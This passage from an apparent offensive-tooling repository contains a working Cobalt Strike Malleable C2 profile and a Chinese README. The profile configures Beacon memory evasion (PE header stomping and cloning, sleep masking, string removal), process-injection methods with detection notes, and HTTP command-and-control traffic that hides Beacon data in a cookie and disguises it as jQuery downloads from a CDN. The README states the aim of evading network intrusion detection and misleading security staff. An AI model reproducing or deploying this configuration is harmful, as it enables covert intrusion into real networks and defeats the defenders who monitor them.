Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values) 250 | # 2nd Line 251 | prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"; 255 | print; 256 | } 257 | } 258 | 259 | client { 260 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 261 | header "Accept-Language" "en-US,en;q=0.5"; 262 | #header "Host" "code.bootcdn.net"; 263 | header "Referer" "http://code.bootcdn.net/"; 264 | header "Accept-Encoding" "gzip, deflate"; 265 | } 266 | } 267 | 268 | ################################################ 269 | ## Memory Indicators 270 | ################################################ 271 | ## Description: 272 | ## The stage block in Malleable C2 profiles controls how Beacon is loaded into memory and edit the content of the Beacon DLL. 273 | ## Values: 274 | ## checksum 0 The CheckSum value in Beacon's PE header 275 | ## cleanup false Ask Beacon to attempt to free memory associated with the Reflective DLL package that initialized it. 276 | ## compile_time 14 July 2009 8:14:00 The build time in Beacon's PE header 277 | ## entry_point 92145 The EntryPoint value in Beacon's PE header 278 | ## image_size_x64 512000 SizeOfImage value in x64 Beacon's PE header 279 | ## image_size_x86 512000 SizeOfImage value in x86 Beacon's PE header 280 | ## module_x64 xpsservices.dll Same as module_x86; affects x64 loader 281 | ## module_x86 xpsservices.dll Ask the x86 ReflectiveLoader to load the specified library and overwrite its space instead of allocating memory with VirtualAlloc. 282 | ## name beacon.x64.dll The Exported name of the Beacon DLL 283 | ## obfuscate false Obfuscate the Reflective DLL's import table, overwrite unused header content, and ask ReflectiveLoader to copy Beacon to new memory without its DLL headers. 284 | ## rich_header N/A Meta-information inserted by the compiler 285 | ## sleep_mask false Obfuscate Beacon (HTTP, SMB, TCP Beacons), in-memory, prior to sleeping (HTTP) or waiting for a new connection\data (SMB\TCP) 286 | ## stomppe true Ask ReflectiveLoader to stomp MZ, PE, and e_lfanew values after it loads Beacon payload 287 | ## userwx false Ask ReflectiveLoader to use or avoid RWX permissions for Beacon DLL in memory 288 | ## Guidelines: 289 | ## - Modify the indicators to minimize in memory indicators 290 | # - Refer to 291 | ## https://blog.cobaltstrike.com/2018/02/08/in-memory-evasion/ 292 | ## https://www.youtube.com/playlist?list=PL9HO6M_MU2nc5Q31qd2CwpZ8J4KFMhgnK 293 | ## https://www.youtube.com/watch?v=AV4XjxYe4GM (Obfuscate and Sleep) 294 | stage { 295 | set userwx "false"; 296 | set stomppe "true"; 297 | set obfuscate "true"; 298 | set name "srv.dll"; 299 | set cleanup "true"; 300 | # CS 3.12 Addition "Obfuscate and Sleep" 301 | set sleep_mask "true"; 302 | 303 | # Values captured using peclone agaist a Windows 10 version of explorer.exe 304 | set checksum "0"; 305 | set compile_time "11 Nov 2016 04:08:32"; 306 | set entry_point "650688"; 307 | set image_size_x86 "4661248"; 308 | set image_size_x64 "4661248"; 309 | set rich_header "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 310 | 311 | ## WARNING: Module stomping 312 | # Cobalt Strike 3.11 also adds module stomping to Beacon's Reflective Loader. When enabled, Beacon's loader will shun VirtualAlloc and instead load a DLL into the current process and overwrite its memory. 313 | # Set module_x86 to a favorite x86 DLL to module stomp with the x86 Beacon. The module_x64 option enables this for the x64 Beacon. 314 | # While this is a powerful feature, caveats apply! If the library you load is not large enough to host Beacon, you will crash Beacon's process. If the current process loads the same library later (for whatever reason), you will crash Beacon's process. Choose carefully. 315 | # By default, Beacon's loader allocates memory with VirtualAlloc. Module stomping is an alternative to this. Set module_x86 to a DLL that is about twice as large as the Beacon payload itself. Beacon's x86 loader will load the specified DLL, find its location in memory, and overwrite it. This is a way to situate Beacon in memory that Windows associates with a file on disk. It's important that the DLL you choose is not needed by the applications you intend to reside in. The module_x64 option is the same story, but it affects the x64 Beacon. 316 | # Details can be found in the In-memory Evasion video series. https://youtu.be/uWVH9l2GMw4 317 | 318 | # set module_x64 "netshell.dll"; 319 | # set module_x86 "netshell.dll"; 320 | 321 | # The transform-x86 and transform-x64 blocks pad and transform Beacon's Reflective DLL stage. These blocks support three commands: prepend, append, and strrep. 322 | transform-x86 { # transform the x86 rDLL stage 323 | prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops 324 | strrep "ReflectiveLoader" "execute"; # Change this text 325 | strrep "This program cannot be run in DOS mode" ""; # Remove this text 326 | strrep "beacon.dll" ""; # Remove this text 327 | } 328 | transform-x64 { # transform the x64 rDLL stage 329 | prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops 330 | strrep "ReflectiveLoader" "execute"; # Change this text in the Beacon DLL 331 | strrep "beacon.x64.dll" ""; # Remove this text in the Beacon DLL 332 | } 333 | 334 | stringw "jQuery"; # Add this string to the DLL 335 | } 336 | 337 | ################################################ 338 | ## Process Injection 339 | ################################################ 340 | ## Description: 341 | ## The process-inject block in Malleable C2 profiles shapes injected content and controls process injection behavior. 342 | ## Values: 343 | ## allocator VirtualAllocEx The preferred method to allocate memory in the remote process. Specify VirtualAllocEx or NtMapViewOfSection. The NtMapViewOfSection option is for same-architecture injection only. VirtualAllocEx is always used for cross-arch memory allocations. 344 | ## min_alloc 4096 Minimum amount of memory to request for injected content. 345 | ## startrwx false Use RWX as initial permissions for injected content. Alternative is RW. 346 | ## userwx false Use RWX as final permissions for injected content. Alternative is RX. 347 | ## 348 | ## Use the transform-x86\x64 to pad content injected by Beacon 349 | ## Use the execute block to control use of Beacon's process injection techniques 350 | ## Guidelines: 351 | ## - Modify the indicators to minimize in memory indicators 352 | # - Refer to 353 | ## https://www.cobaltstrike.com/help-malleable-c2#processinject 354 | ## https://blog.cobaltstrike.com/2019/08/21/cobalt-strikes-process-injection-the-details/ 355 | 356 | process-inject { 357 | 358 | # set a remote memory allocation technique: VirtualAllocEx|NtMapViewOfSection 359 | set allocator "NtMapViewOfSection"; 360 | 361 | # Minimium memory allocation size when injecting content 362 | set min_alloc "17500"; 363 | 364 | # Set memory permissions as permissions as initial=RWX, final=RX 365 | set startrwx "false"; 366 | set userwx "false"; 367 | 368 | # Transform injected content to avoid signature detection of first few bytes. Only supports prepend and append. 369 | transform-x86 { 370 | prepend "\x90\x90"; 371 | #append "\x90\x90"; 372 | } 373 | 374 | transform-x64 { 375 | prepend "\x90\x90"; 376 | #append "\x90\x90"; 377 | } 378 | 379 | ## The execute block controls the methods Beacon will use when it needs to inject code into a process. Beacon examines each option in the execute block, determines if the option is usable for the current context, tries the method when it is usable, and moves on to the next option if code execution did not happen. The execute options include: 380 | # 381 | # Name x86->x64 x64-x86 Notes 382 | ######################################################################### 383 | # CreateThread Current Process only 384 | # CreateRemoteThread Yes No cross-session 385 | # NtQueueApcThread 386 | # NtQueAPCThread-s This is the "Early Bird" injection technique. Suspended processes (e.g., post-ex jobs) only. 387 | # RtlCreateUserThread Yes Yes Risky on XP-era targets; uses RWX shellcode for x86->x64 injection. 388 | # SetThreadContext Yes Suspended processes (e.g. post-ex jobs only) 389 | execute { 390 | 391 | # The order is important! Each step will be attempted (if applicable) until successful 392 | ## self-injection 393 | CreateThread "ntdll!RtlUserThreadStart+0x42"; 394 | CreateThread; 395 | 396 | ## Injection via suspened processes (SetThreadContext|NtQueueApcThread-s) 397 | # OPSEC - when you use SetThreadContext; your thread will have a start address that reflects the original execution entry point of the temporary process. 398 | # SetThreadContext; 399 | NtQueueApcThread-s; 400 | 401 | ## Injection into existing processes 402 | # OPSEC Uses RWX stub - Detected by Get-InjectedThread. Less detected by some defensive products. 403 | #NtQueueApcThread; 404 | 405 | # CreateRemotThread - Vanilla cross process injection technique. Doesn't cross session boundaries 406 | # OPSEC - fires Sysmon Event 8 407 | CreateRemoteThread; 408 | 409 | # RtlCreateUserThread - Supports all architecture dependent corner cases (e.g., 32bit -> 64bit injection) AND injection across session boundaries 410 | # OPSEC - fires Sysmon Event 8. Uses Meterpreter implementation and RWX stub - Detected by Get-InjectedThread 411 | RtlCreateUserThread; 412 | } 413 | } 414 | 415 | 416 | ################################################ 417 | ## HTTP Headers 418 | ################################################ 419 | ## Description: 420 | ## The http-config block has influence over all HTTP responses served by Cobalt Strike’s web server. Here, you may specify additional HTTP headers and the HTTP header order. 421 | ## Values: 422 | ## set headers "Comma separated list of headers" The set headers option specifies the order these HTTP headers are delivered in an HTTP response. Any headers not in this list are added to the end. 423 | ## header "headername" "header alue The header keyword adds a header value to each of Cobalt Strike's HTTP responses. If the header value is already defined in a response, this value is ignored. 424 | ## set trust_x_forwarded_for "true" Adds this header to determine remote address of a request. 425 | ## Guidelines: 426 | ## - Use this section in addition to the "server" secion in http-get and http-post to further define the HTTP headers 427 | 428 | http-config { 429 | set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type"; 430 | header "Server" "Apache"; 431 | header "Keep-Alive" "timeout=10, max=100"; 432 | header "Connection" "Keep-Alive"; 433 | # Use this option if your teamserver is behind a redirector 434 | set trust_x_forwarded_for "true"; 435 | } 436 | 437 | ################################################ 438 | ## HTTP GET 439 | ################################################ 440 | ## Description: 441 | ## GET is used to poll teamserver for tasks 442 | ## Defaults: 443 | ## uri "/activity" 444 | ## Headers (Sample) 445 | ## Accept: */* 446 | ## Cookie: CN7uVizbjdUdzNShKoHQc1HdhBsB0XMCbWJGIRF27eYLDqc9Tnb220an8ZgFcFMXLARTWEGgsvWsAYe+bsf67HyISXgvTUpVJRSZeRYkhOTgr31/5xHiittfuu1QwcKdXopIE+yP8QmpyRq3DgsRB45PFEGcidrQn3/aK0MnXoM= 447 | ## User-Agent Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1) 448 | ## Guidelines: 449 | ## - Add customize HTTP headers to the HTTP traffic of your campaign 450 | ## - Analyze sample HTTP traffic to use as a reference 451 | ## - Multiple URIs can be added. Beacon will randomly pick from these. 452 | ## - Use spaces as a URI seperator 453 | http-get { 454 | 455 | set uri "/ajax/libs/jquery/3.3.1/jquery.min.js"; 456 | set verb "GET"; 457 | 458 | client { 459 | 460 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 461 | #header "Host" "code.bootcdn.net"; 462 | header "Referer" "http://code.bootcdn.net/"; 463 | header "Accept-Encoding" "gzip, deflate"; 464 | 465 | metadata { 466 | base64url; 467 | prepend "__cfduid="; 468 | header "Cookie"; 469 | } 470 | } 471 | 472 | server { 473 | 474 | header "Server" "NetDNA-cache/2.2"; 475 | header "Cache-Control" "max-age=0, no-cache"; 476 | header "Pragma" "no-cache"; 477 | header "Connection" "keep-alive"; 478 | header "Content-Type" "application/javascript; charset=utf-8"; 479 | 480 | output { 481 | mask; 482 | base64url; 483 | ## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values) 484 | # 2nd Line 485 | prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"; 489 | print; 490 | } 491 | } 492 | } 493 | 494 | ################################################ 495 | ## HTTP POST 496 | ################################################ 497 | ## Description: 498 | ## POST is used to send output to the teamserver 499 | ## Can use HTTP GET or POST to send data 500 | ## Note on using GET: Beacon will automatically chunk its responses (and use multiple requests) to fit the constraints of an HTTP GET-only channel. 501 | ## Defaults: 502 | ## uri "/activity" 503 | ## Headers (Sample) 504 | ## Accept: */* 505 | ## Cookie: CN7uVizbjdUdzNShKoHQc1HdhBsB0XMCbWJGIRF27eYLDqc9Tnb220an8ZgFcFMXLARTWEGgsvWsAYe+bsf67HyISXgvTUpVJRSZeRYkhOTgr31/5xHiittfuu1QwcKdXopIE+yP8QmpyRq3DgsRB45PFEGcidrQn3/aK0MnXoM= 506 | ## User-Agent Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1) 507 | ## Guidelines: 508 | ## - Decide if you want to use HTTP GET or HTTP POST requests for this section 509 | ## - Add customize HTTP headers to the HTTP traffic of your campaign 510 | ## - Analyze sample HTTP traffic to use as a reference 511 | ## Use HTTP POST for http-post section 512 | ## Uncomment this Section to activate 513 | http-post { 514 | 515 | set uri "/ajax/libs/jquery/3.3.0/jquery.min.js"; 516 | set verb "POST"; 517 | 518 | client { 519 | 520 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 521 | #header "Host" "code.bootcdn.net"; 522 | header "Referer" "http://code.bootcdn.net/"; 523 | header "Accept-Encoding" "gzip, deflate"; 524 | 525 | id { 526 | mask; 527 | base64url; 528 | parameter "__cfduid"; 529 | } 530 | 531 | output { 532 | mask; 533 | base64url; 534 | print; 535 | } 536 | } 537 | 538 | server { 539 | 540 | header "Server" "NetDNA-cache/2.2"; 541 | header "Cache-Control" "max-age=0, no-cache"; 542 | header "Pragma" "no-cache"; 543 | header "Connection" "keep-alive"; 544 | header "Content-Type" "application/javascript; charset=utf-8"; 545 | 546 | output { 547 | mask; 548 | base64url; 549 | ## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values) 550 | # 2nd Line 551 | prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"; 555 | print; 556 | } 557 | } 558 | } 559 | 560 | ## Use HTTP GET for http-post section 561 | ## Uncomment this Section to activate 562 | # http-post { 563 | 564 | # set uri "/ajax/libs/jquery/3.3.0/jquery.min.js"; 565 | # set verb "GET"; 566 | 567 | # client { 568 | 569 | # header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 570 | # #header "Host" "code.bootcdn.net"; 571 | # header "Referer" "http://code.bootcdn.net/"; 572 | # header "Accept-Encoding" "gzip, deflate"; 573 | 574 | # id { 575 | # mask; 576 | # base64url; 577 | # parameter "__cfduid"; 578 | # } 579 | 580 | # output { 581 | # mask; 582 | # base64url; 583 | # parameter "__tg"; 584 | # } 585 | # } 586 | 587 | # server { 588 | 589 | # header "Server" "NetDNA-cache/2.2"; 590 | # header "Cache-Control" "max-age=0, no-cache"; 591 | # header "Pragma" "no-cache"; 592 | # header "Connection" "keep-alive"; 593 | # header "Content-Type" "application/javascript; charset=utf-8"; 594 | 595 | # output { 596 | # mask; 597 | # base64url; 598 | # ## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values) 599 | # # 2nd Line 600 | # prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"; 604 | # print; 605 | # } 606 | # } 607 | # } 608 | 609 | ## CS 4.0 Profile Variants 610 | ## Variants are selectable when configuring an HTTP or HTTPS Beacon listener. Variants allow each HTTP or HTTPS Beacon listener tied to a single team server to have network IOCs that differ from each other. 611 | ## You may add profile "variants" by specifying additional http-get, http-post, http-stager, and https-certifcate blocks with the following syntax: 612 | ## [block name] "variant name" { ... }. Here's a variant http-get block named "My Variant": 613 | ## http-get "My Variant" { 614 | ## client { 615 | ## parameter "bar" "blah"; 616 | 617 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## 1135-CobaltStrike-ToolKit 2 | 3 | ### Malleable C2 Files 4 | 5 | Cobalt Strike的Malleable C2配置文件,被设计用来对抗流量分析。 6 | 7 | Cobalt Strike的Malleable C2配置文件,定义了 victim 与 团队服务器 之间的C2通信流量的“通信格式规范和方式”。 8 | 9 | 通过将C2流量伪装成"正常流量"。以避免直接被NIDS、SOC系统识别为异常流量,可能迷惑安全运营人员。 10 | 11 | 12 | 具体说明 13 | 14 | |Malleable C2 profile|cs version|描述| 15 | |:-----:|--|--| 16 | |jquery.xxx.js_CN_cdn.bootcss.com_for_cs3.14_.txt|3.12 3.14|伪装成正常HTTP流量: 浏览器与web服务器之间的流量. | 17 | |jquery.xxx.js_code.bootcdn.net_for_cs4.0_.txt| 4.0 | 伪装成正常HTTP流量: 浏览器与web服务器之间的流量. | 18 | 19 | 建议自行修改 Malleable C2 profile. 20 | 21 | * 其他参考 22 | * [APT级的全面免杀与企业纵深防御体系的对抗 - 先知社区](https://xz.aliyun.com/t/4191) 23 | * https://github.com/threatexpress/malleable-c2 24 | 25 | --- 26 | 27 | ### AggressorScripts 28 | 29 | AggressorScripts - 修改或扩展Cobalt Strike 3.* 的客户端功能(可实现自定义菜单创建,日志记录,权限维持等)。 30 | 31 | 更多参考官方介绍[Aggressor Script Tutorial and Reference](https://www.cobaltstrike.com/aggressor-script/index.html) 32 | 33 | 具体说明 34 | 35 | |filename|opsec|desc|demo| 36 | |:-----:|--|------|-------| 37 | |BeaconNote.cna|1|某个Beacon首次上线时 设置这个Beacon的note为`Beacon ID + 首次上线时间` |`bid: 86985 Established: 11/13/2019 16:50:19 (CST)`| 38 | 